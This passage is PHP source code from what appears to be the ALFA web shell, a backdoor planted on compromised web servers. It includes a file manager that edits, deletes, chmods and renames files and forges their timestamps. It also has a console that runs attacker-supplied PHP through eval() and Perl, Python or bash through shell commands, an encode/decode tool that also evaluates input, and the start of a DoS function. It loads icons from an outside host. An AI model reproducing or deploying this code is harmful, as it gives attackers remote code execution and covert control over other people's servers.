            echo '<tr class="fmanager-row" id="tr_row_' . $cc . '"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="' . $raw_name . '" class="chkbx" id="' . $checkbox . '"><label for="' . $checkbox . '"></label></div></td><td id="td_row_' . $cc . '">' . $icon . '<div style="' . $style . '"><a row="' . $cc . '" id="id_' . $cc . '" class="main_name" onclick="' . ($f['type'] == 'file' ? 'editor(\'' . $raw_name . '\',\'auto\',\'\',\'\',\'\',\'' . $f['type'] . '\');" href="#action=fileman&path=' . $GLOBALS['cwd'] . '&file=' . $raw_name . '" fname="' . $raw_name . '" ftype="file" path="' . $GLOBALS['cwd'] . '" opt_title="' . $f['link'] . '" ' . (isset($f['link']) ? 'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"' : '') . '>' . ($GLOBALS['cwd'] . $f['name'] == $GLOBALS['__file_path'] ? "<span class='shell_name' style='font-weight:unset;'>" . $f['name'] . "</span>" : htmlspecialchars($newname)) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" href="#action=fileman&path=' . $f['path'] . '" fname="' . $raw_name . '" ftype="folder" path="' . $GLOBALS['cwd'] . '" opt_title="' . $f['link'] . '" ' . (isset($f['link']) ? 'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"' : '') . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>') . '</a></td></div><td><span style="font-weight:unset;" class="main_size">' . ($f['type'] == 'file' ? (isset($f['link']) ? '[L] ' : '') . alfaSize($f['size']) : $f['type']) . '</span></td><td><span style="font-weight:unset;" class="main_modify">' . $f['modify'] . '</span></td><td><span style="font-weight:unset;" class="main_owner_group">' . $f['owner'] . '/' . $f['group'] . '</span></td><td><a id="id_chmode_' . $cc . '" href=javascript:void(0) onclick="editor(\'' . $raw_name . '\',\'chmod\',\'\',\'\',\'\',\'' . $f['type'] . '\')">' . $f['perms'] . '</td><td><a id="id_rename_' . $cc . '" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'rename\',\'\',\'\',\'\',\'' . $f['type'] . '\')">R</a> <a id="id_touch_' . $cc . '" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'touch\',\'\',\'\',\'\',\'' . $f['type'] . '\')">T</a>' . ($f['type'] == 'file' ? ' <a id="id_edit_' . $cc . '" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'edit\',\'\',\'\',\'\',\'' . $f['type'] . '\')">E</a> <a id="id_download_' . $cc . '" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $raw_name . '\', \'download\')">D</a>' : '') . '<a id="id_delete_' . $cc . '" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # ' . addslashes(rawurldecode($f['name'])) . ' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'' . $raw_name . '\') : \'\';"> X </a></td></tr>';
            $l = $l ? 0 : 1;
            $cc++;
        }
        echo "<tr id='filemanager_last_tr'><td colspan=7>\r\n<input type=hidden name=a value='FilesMan'>\r\n<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['glob_chdir_false'] ? $_POST['c'] : $GLOBALS['cwd']) . "'>\r\n<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>\r\n<input type='submit' value=' '>\r\n</form></table><div class='pages-holder'><div class='pages-number'>" . $page_builder . "</div></div></div></div>";
        alfafooter();
    }
    function get_pagination_links($current_page, $total_pages)
    {
        $links = "";
        if ($total_pages >= 1 && $current_page <= $total_pages) {
            $links = "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
            $selected_page = "";
            if ($current_page == 1) {
                $selected_page = " active-page-number";
            }
            $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number" . $selected_page . "\">1</a>";
            $i = max(2, $current_page - 5);
            if ($i > 2) {
                $links .= "<a class=\"page-number\">...</a>";
            }
            for (; $i < min($current_page + 6, $total_pages); $i++) {
                if ($i == $current_page) {
                    $selected_page = " active-page-number";
                } else {
                    $selected_page = "";
                }
                $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number" . $selected_page . "\">{$i}</a>";
            }
            if ($i != $total_pages) {
                $links .= "<a class=\"page-number\">...</a>";
            }
            $selected_page = " last-page-number";
            if ($current_page == $total_pages) {
                $selected_page = " last-page-number active-page-number";
            }
            $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number" . $selected_page . "\">{$total_pages}</a>";
            $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
        }
        return $links;
    }
    function alfaFilesTools()
    {
        alfahead();
        echo "<div class=\"filestools\" style=\"height: 100%;\">";
        if (isset($_POST['alfa1'])) {
            $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
        }
        $alfa1_decoded = $_POST['alfa1'];
        $chdir_fals = false;
        if (!@chdir($_POST['c'])) {
            $chdir_fals = true;
            $_POST['alfa1'] = $_POST["c"] . "/" . $_POST["alfa1"];
            $alfa_canruncmd = _alfa_can_runCommand(true, true);
            if ($alfa_canruncmd) {
                $slashed_alfa1 = addslashes($_POST['alfa1']);
                $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "' . $slashed_alfa1 . '"'));
                $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi");
            }
        }
        if ($_POST['alfa2'] == 'auto') {
            if (is_array(@getimagesize($_POST['alfa1']))) {
                $_POST['alfa2'] = 'image';
            } else {
                $_POST['alfa2'] = 'view';
                if ($chdir_fals) {
                    if ($alfa_canruncmd) {
                        $mime = explode(":", alfaEx("file --mime-type '" . addslashes($_POST['alfa1']) . "'"));
                        $mimetype = $mime[1];
                        if (!empty($mimetype)) {
                            if (strstr($mimetype, "image")) {
                                $_POST['alfa2'] = 'image';
                            }
                        }
                    }
                }
            }
        }
        if ($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])) {
            $rename_cache = $_POST['alfa3'];
        }
        if (@$_POST['alfa2'] == 'mkfile') {
            $_POST['alfa1'] = trim($_POST['alfa1']);
            if ($chdir_fals && $alfa_canruncmd) {
                if (_alfa_is_writable($_POST["c"])) {
                    alfaEx("cd '" . addslashes($_POST["c"]) . "';touch '" . addslashes($alfa1_decoded) . "'");
                    $_POST['alfa2'] = "edit";
                }
            }
            if (!@file_exists($_POST['alfa1'])) {
                $fp = @fopen($_POST['alfa1'], 'w');
                if ($fp) {
                    $_POST['alfa2'] = "edit";
                    fclose($fp);
                }
            } else {
                $_POST['alfa2'] = "edit";
            }
        }
        if (!_alfa_file_exists(@$_POST['alfa1'])) {
            echo __pre() . "<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST['alfa4'] . "');</script>";
            alfaFooter();
            return;
        }
        if ($chdir_fals) {
            $filesize = $file_info[3];
            $uid["name"] = $file_info[1];
            $gid["name"] = $file_info[2];
            $permcolor = alfaPermsColor(array("class" => $perm_color_class, "num" => $file_info[5], "human" => $file_info[6]), true);
        } else {
            $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST['alfa1'])) : '';
            $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST['alfa1'])) : '';
            if (!$uid && !$gid) {
                $uid['name'] = function_exists("fileowner") ? @fileowner($_POST['alfa1']) : '';
                $gid['name'] = function_exists("filegroup") ? @filegroup($_POST['alfa1']) : '';
            }
            $permcolor = alfaPermsColor($_POST['alfa1']);
            $filesize = @filesize($_POST['alfa1']);
            if (!isset($uid['name'], $gid['name']) || empty($uid['name']) || empty($gid['name'])) {
                if (_alfa_can_runCommand()) {
                    list($uid['name'], $gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "' . addslashes($_POST["c"] . "/" . $_POST["alfa1"]) . '"'));
                }
            }
        }
        if (substr($_POST['alfa1'], 0, 7) == "phar://") {
            $alfa_file_directory = $_POST['alfa1'];
        } else {
            $alfa_file_directory = str_replace("//", "/", ($chdir_fals ? "" : $_POST['c'] . '/') . $_POST['alfa1']);
        }
        echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> ' . htmlspecialchars(basename($alfa1_decoded)) . ' <span class="editor_file_info_vars">Size:</span> ' . alfaSize($filesize) . ' <span class="editor_file_info_vars">Permission:</span> ' . $permcolor . ' <span class="editor_file_info_vars">Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . ' <span class="editor_file_info_vars">Directory:</span> ' . dirname($alfa_file_directory) . '</div>';
        if (empty($_POST['alfa2'])) {
            $_POST['alfa2'] = 'view';
        }
        if (!_alfa_is_dir($_POST['alfa1'])) {
            $m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
            $ftype = "file";
        } else {
            $m = array('Chmod', 'Rename', 'Touch');
            $ftype = "dir";
        }
        echo "<div>";
        foreach ($m as $v) {
            echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\'):\'\';"><span class="editor_actions">' . (strtolower($v) == @$_POST['alfa2'] ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\')"><span class="editor_actions">' . (strtolower($v) == @$_POST['alfa2'] ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a>';
        }
        echo "</div>";
        switch ($_POST['alfa2']) {
            case 'view':
            case 'edit':
                @chdir($_POST['c']);
                $disabled_btn = "";
                if (!@is_writable($_POST['alfa1']) && !_alfa_is_writable($_POST['alfa1'])) {
                    $disabled_btn = "disabled=disabled";
                    $disabled_btn_style = 'background: #ff0000;color: #fff;';
                }
                if (!empty($_POST['alfa3'])) {
                    $_POST['alfa3'] = substr($_POST['alfa3'], 1);
                    $time = @filemtime($_POST['alfa1']);
                    $fp = @__write_file($_POST['alfa1'], $_POST['alfa3']);
                    if ($chdir_fals && $alfa_canruncmd) {
                        $rname = $alfa1_decoded;
                        $randname = $rname . rand(111, 9999);
                        $filepath = dirname($_SERVER["SCRIPT_FILENAME"]) . "/" . $randname;
                        if ($fp = @__write_file($filepath, $_POST['alfa3'])) {
                            alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST["alfa1"]) . "';rm -f '" . addslashes($filepath) . "'");
                        }
                    }
                    if ($fp) {
                        echo "Saved!<br>";
                        @touch($_POST['alfa1'], $time, $time);
                    }
                }
                echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">' . _alfa_load_ace_options("editor") . '<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\'' . addslashes($alfa1_decoded) . '\',\'edit\',\'1\'+ace_val,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;' . $disabled_btn_style . '" ' . $disabled_btn . '>save</button></div><pre class="ml1 view_ml_content">';
                echo htmlspecialchars(__read_file($_POST['alfa1']));
                echo "</pre></div></div>";
                break;
            case 'highlight':
                @chdir($_POST['c']);
                if (@is_readable($_POST['alfa1'])) {
                    echo "<div class=\"editor-view\"><div class=\"view-content\"><div class=\"ml1\" style=\"background-color: #e1e1e1;color:black;\">";
                    $code = @highlight_file($_POST['alfa1'], true);
                    echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div></div></div>';
                }
                break;
            case 'delete':
                @chdir($_POST['c']);
                if (@is_writable($_POST['alfa1']) || $GLOBALS["glob_chdir_false"]) {
                    $deleted = true;
                    if (!@unlink($_POST['alfa1'])) {
                        $deleted = false;
                        if ($alfa_canruncmd) {
                            if (_alfa_is_writable($_POST['alfa1'])) {
                                alfaEx("rm -f '" . addslashes($_POST['alfa1']) . "'");
                                $deleted = true;
                            }
                        }
                    }
                    if ($deleted) {
                        echo 'File Deleted...<script>var elem = $("' . $_POST['alfa4'] . '").parentNode;elem.parentNode.removeChild(elem);delete editor_files["' . $_POST['alfa4'] . '"];</script>';
                    } else {
                        echo "Error...";
                    }
                }
                break;
            case 'chmod':
                @chdir($_POST['c']);
                if (!empty($_POST['alfa3'])) {
                    $perms = 0;
                    for ($i = strlen($_POST['alfa3']) - 1; $i >= 0; --$i) {
                        $perms += (int) $_POST['alfa3'][$i] * pow(8, strlen($_POST['alfa3']) - $i - 1);
                    }
                    if (!@chmod($_POST['alfa1'], $perms)) {
                        if ($chdir_fals && $alfa_canruncmd) {
                            alfaEx("cd '" . addslashes($_POST["c"]) . "';chmod " . addslashes($_POST['alfa3']) . " '" . addslashes($alfa1_decoded) . "'");
                            echo "Success!";
                        } else {
                            echo "<font color=\"#FFFFFF\"><b>Can't set permissions!</b></font><br><script>document.mf.alfa3.value=\"\";</script>";
                        }
                    } else {
                        echo "Success!";
                    }
                }
                clearstatcache();
                AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1);
                if ($chdir_fals) {
                    $file_perm = $file_info[5];
                } else {
                    $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])), -4);
                }
                echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.chmod.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="chmod" value="' . $file_perm . '"><input type=submit value=" "></form>';
                break;
            case 'hexdump':
                @chdir($_POST['c']);
                $c = __read_file($_POST['alfa1']);
                $n = 0;
                $h = array('00000000<br>', '', '');
                $len = strlen($c);
                for ($i = 0; $i < $len; ++$i) {
                    $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
                    switch (ord($c[$i])) {
                        case 0:
                            $h[2] .= ' ';
                            break;
                        case 9:
                            $h[2] .= ' ';
                            break;
                        case 10:
                            $h[2] .= ' ';
                            break;
                        case 13:
                            $h[2] .= ' ';
                            break;
                        default:
                            $h[2] .= $c[$i];
                            break;
                    }
                    $n++;
                    if ($n == 32) {
                        $n = 0;
                        if ($i + 1 < $len) {
                            $h[0] .= sprintf('%08X', $i + 1) . '<br>';
                        }
                        $h[1] .= '<br>';
                        $h[2] .= "\n";
                    }
                }
                echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table></div></div>';
                break;
            case 'rename':
                @chdir($_POST['c']);
                $alfa1_escape = addslashes($_POST["alfa1"]);
                $alfa3_escape = addslashes($_POST["alfa3"]);
                if (!empty($_POST['alfa3'])) {
                    $cmd_rename = false;
                    if ($chdir_fals && $alfa_canruncmd) {
                        if (_alfa_is_writable($_POST['alfa1'])) {
                            $alfa1_escape = addslashes($alfa1_decoded);
                            alfaEx("cd '" . addslashes($_POST['c']) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST['alfa3']) . "'");
                        } else {
                            $cmd_rename = true;
                        }
                    } else {
                        $alfa1_escape = addslashes($_POST["alfa1"]);
                    }
                    if (!@rename($_POST['alfa1'], $_POST['alfa3']) && $cmd_rename) {
                        echo "Can't rename!<br>";
                    } else {
                        echo 'Renamed!<script>try{$("' . $_POST['alfa4'] . '").innerHTML = "<div class=\'editor-icon\'>"+loadType(\'' . $alfa3_escape . '\',\'' . $ftype . '\',\'' . $_POST['alfa4'] . '\')+"</div><div class=\'editor-file-name\'>' . $alfa3_escape . '</div>";editor_files["' . $_POST['alfa4'] . '"].file = "' . $alfa3_escape . '";updateFileEditor("' . $alfa1_escape . '", "' . $alfa3_escape . '");' . ($ftype == "dir" ? "updateDirsEditor('" . $_POST['alfa4'] . "','" . $alfa1_escape . "');" : "") . '}catch(e){console.log(e)}</script>';
                        $alfa1_escape = $alfa3_escape;
                    }
                }
                echo '<form onsubmit="editor(\'' . $alfa1_escape . '\',\'' . $_POST['alfa2'] . '\',this.name.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="name" value="' . addslashes(htmlspecialchars(isset($_POST['alfa3']) && $_POST['alfa3'] != '' ? $_POST['alfa3'] : $alfa1_decoded)) . '"><input type=submit value=" "></form>';
                break;
            case 'touch':
                @chdir($_POST['c']);
                if (!empty($_POST['alfa3'])) {
                    $time = strtotime($_POST['alfa3']);
                    if ($time) {
                        $touched = false;
                        if ($chdir_fals && $alfa_canruncmd) {
                            alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST['alfa3'])) . "' '" . addslashes($alfa1_decoded) . "'");
                            $touched = true;
                        }
                        if (!@touch($_POST['alfa1'], $time, $time) && !$touched) {
                            echo "Fail!";
                        } else {
                            echo "Touched!";
                        }
                    } else {
                        echo "Bad time format!";
                    }
                }
                clearstatcache();
                echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.touch.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", $chdir_fals ? $file_info[4] : @filemtime($_POST['alfa1'])) . '"><input type=submit value=" "></form>';
                break;
            case 'image':
                @chdir($_POST['c']);
                echo "<hr>";
                $file = $_POST['alfa1'];
                $image_info = @getimagesize($file);
                if (is_array($image_info) || $chdir_fals) {
                    $width = (int) $image_info[0];
                    $height = (int) $image_info[1];
                    if ($chdir_fals && $alfa_canruncmd) {
                        $source = alfaEx("cat '" . addslashes($file) . "' | base64");
                        list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '" . addslashes($file) . "'"));
                        $mime = explode(":", alfaEx("file --mime-type '" . addslashes($file) . "'"));
                        $image_info['mime'] = $mime[1];
                    } else {
                        $source = __ZW5jb2Rlcg(__read_file($file, false));
                    }
                    $image_info_h = "Image type = <span>[</span> " . $image_info['mime'] . " <span>]</span><br>Image Size = <span>[ </span>" . $width . " x " . $height . "<span> ]</span><br>";
                    if ($width > 800) {
                        $width = 800;
                    }
                    echo $content = "<div class='editor-view'><div class='view-content'><center>" . $image_info_h . "<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:" . $image_info['mime'] . ";base64," . $source . "' alt='" . $file . "'></center></div></div><br>";
                }
                break;
        }
        echo "</div>";
        alfaFooter();
    }
    function findicon($file, $type)
    {
        $s = 'http://solevisible.com/icons/';
        $types = array('json', 'ppt', 'pptx', 'xls', 'xlsx', 'msi', 'config', 'cgi', 'pm', 'c', 'cpp', 'cs', 'java', 'aspx', 'asp', 'db', 'ttf', 'eot', 'woff', 'woff2', 'woff', 'conf', 'log', 'apk', 'cab', 'bz2', 'tgz', 'dmg', 'izo', 'jar', '7z', 'iso', 'rar', 'bat', 'sh', 'alfa', 'gz', 'tar', 'php', 'php4', 'php5', 'phtml', 'html', 'xhtml', 'shtml', 'htm', 'zip', 'png', 'jpg', 'jpeg', 'gif', 'bmp', 'ico', 'txt', 'js', 'rb', 'py', 'xml', 'css', 'sql', 'htaccess', 'pl', 'ini', 'dll', 'exe', 'mp3', 'mp4', 'm4a', 'mov', 'flv', 'swf', 'mkv', 'avi', 'wmv', 'mpg', 'mpeg', 'dat', 'pdf', '3gp', 'doc', 'docx', 'docm');
        if ($type != 'file') {
            return $file == '..' ? "http://solevisible.com/icons/back.png" : "http://solevisible.com/icons/folder.png";
        } else {
            $ext = explode('.', $file);
            $ext = end($ext);
            $ext = strtolower($ext);
            return in_array($ext, $types) ? $s . $ext . '.png' : "http://solevisible.com/icons/notfound.png";
        }
    }
    function alfadlfile()
    {
        if (isset($_POST['c'], $_POST['file'])) {
            $basename = rawurldecode(basename($_POST['file']));
            $_POST['file'] = str_replace("//", "/", $_POST['c'] . '/' . $basename);
            $alfa_canruncmd = _alfa_can_runCommand(true, true);
            if (@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd) {
                ob_start("ob_gzhandler", 4096);
                header("Content-Disposition: attachment; filename=\"" . addslashes($basename) . "\"");
                header("Content-Type: application/octet-stream");
                if ($GLOBALS["glob_chdir_false"]) {
                    $randname = $basename . rand(111, 9999);
                    $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
                    $filepath = $scriptpath . "/" . $randname;
                    if (_alfa_is_writable($scriptpath)) {
                        alfaEx("cp '" . addslashes($_POST["file"]) . "' '" . addslashes($filepath) . "'");
                        readfile($filepath);
                        @unlink($filepath);
                    } else {
                        alfaEx("cat '" . addslashes($_POST["file"]) . "'");
                    }
                } else {
                    readfile($_POST['file']);
                }
            } else {
                echo "Error...!";
            }
        }
    }
    function __alfa_set_cookie($key, $value)
    {
        $_COOKIE[$key] = $value;
        @setcookie($key, $value, time() + 604800, '/');
    }
    function alfaphpeval()
    {
        if (isset($_COOKIE["eval_tmpdir"]) && @is_dir($_COOKIE["eval_tmpdir"])) {
            $tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);
        } else {
            $tempdir = dirname(alfaEx("mktemp"));
            __alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));
        }
        alfahead();
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'ini') {
            echo "<div class=header>";
            ob_start();
            $INI = ini_get_all();
            print "<table border=0><tr><td class=\"listing\"><font class=\"highlight_txt\">Param</td><td class=\"listing\"><font class=\"highlight_txt\">Global value</td><td class=\"listing\"><font class=\"highlight_txt\">Local Value</td><td class=\"listing\"><font class=\"highlight_txt\">Access</td></tr>";
            foreach ($INI as $param => $values) {
                print "\n<tr><td class=\"listing\"><b>" . $param . '</td>' . '<td class="listing">' . $values['global_value'] . ' </td>' . '<td class="listing">' . $values['local_value'] . ' </td>' . '<td class="listing">' . $values['access'] . ' </td></tr>';
            }
            $tmp = ob_get_clean();
            $tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
            $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
            echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'info') {
            echo "<div class=header><style>.p {color:#000;}</style>";
            ob_start();
            phpinfo();
            $tmp = ob_get_clean();
            $tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
            $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
            echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'exten') {
            echo "<div class=header>";
            ob_start();
            $EXT = get_loaded_extensions();
            echo '<table border=0><tr><td class="listing">' . implode("</td></tr>\n<tr><td class=\"listing\">", $EXT) . '</td></tr></table>' . count($EXT) . ' extensions loaded';
            echo "</div><br>";
        }
        $lang_html = "";
        foreach (array("php" => "php ~> [ Windows / Linux ]", "perl" => "perl ~> [ Linux ]", "python" => "python ~> [ Linux ]", "bash" => "bash ~> [ Linux ]") as $key => $val) {
            $lang_html .= '<option value="' . $key . '" ' . ($_POST["alfa3"] == $key ? "selected" : "") . '>' . $val . '</option>';
        }
        echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">' . $lang_html . '</select>' . _alfa_load_ace_options("eval") . '<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">' . (!empty($_POST['alfa1']) ? htmlspecialchars($_POST['alfa1']) : "&lt;?php\n\n\techo('hello alfa !');\n\n?>") . '</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
        echo '</form><pre id="PhpOutput" style="' . (empty($_POST['alfa1']) ? 'display:none;' : '') . 'margin-top:5px;" class="ml1">';
        if (!empty($_POST['alfa1'])) {
            if ($_POST['alfa3'] == "php") {
                ob_start();
                eval('?>' . $_POST['alfa1']);
                $result = htmlspecialchars(ob_get_clean());
            } elseif (_alfa_can_runCommand() && $GLOBALS["sys"] == "unix") {
                $lang = $_POST['alfa3'];
                $filename = "temp" . rand(11111, 99999);
                $temp = $tempdir . "/" . $filename;
                __write_file($filename, $_POST['alfa1']);
                $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
                @unlink($filename);
                @unlink($temp);
            }
            echo '<textarea class="bigarea">' . $result . '</textarea>';
        }
        echo "</pre></div>";
        alfafooter();
    }
    function alfahash()
    {
        if (!function_exists('hex2bin')) {
            function hex2bin($p)
            {
                return decbin(hexdec($p));
            }
        }
        if (!function_exists('full_urlencode')) {
            function full_urlencode($p)
            {
                $r = '';
                for ($i = 0; $i < strlen($p); ++$i) {
                    $r .= '%' . dechex(ord($p[$i]));
                }
                return strtoupper($r);
            }
        }
        $stringTools = array('Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)', 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)', 'strrev ( $string )' => 'strrev($s)', 'bin2hex ( $string )' => 'bin2hex($s)', 'hex2bin ( $string )' => 'hex2bin($s)', 'md5 ( $string )' => 'md5($s)', 'sha1 ( $string )' => 'sha1($s)', 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)', 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)', 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)', 'crypt ( $string )' => 'crypt($s)', 'crc32 ( $string )' => 'crc32($s)', 'str_rot13 ( $string )' => 'str_rot13($s)', 'urlencode ( $string )' => 'urlencode($s)', 'urldecode  ( $string )' => 'urldecode($s)', 'full_urlencode  ( $string )' => 'full_urlencode($s)', 'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)', 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))', 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))', 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))', 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))', 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))', 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))');
        alfahead();
        echo "<div class=header>";
        echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
        foreach ($stringTools as $k => $v) {
            echo "<option value='" . htmlspecialchars($v) . "' " . ($_POST['alfa1'] == $v ? 'selected' : '') . ">" . $k . "</option>";
        }
        echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>" . (empty($_POST['alfa1']) ? '' : htmlspecialchars(@$_POST['alfa2'])) . "</textarea></form>";
        if (!empty($_POST['alfa1'])) {
            $string = addslashes($_POST['alfa2']);
            $string = str_replace('\\"', '"', $string);
            $alg = $_POST['alfa1'];
            $code = str_replace('$s', "'" . $string . "'", $alg);
            ob_start();
            eval('echo ' . $code . ';');
            $res = ob_get_contents();
            ob_end_clean();
            if (in_array($alg, $stringTools)) {
                echo '<textarea class="bigarea">' . htmlspecialchars($res) . '</textarea>';
            }
        }
        echo "</div>";
        alfaFooter();
    }
    function alfados()
    {
        alfahead();
        echo "<div class=header>";
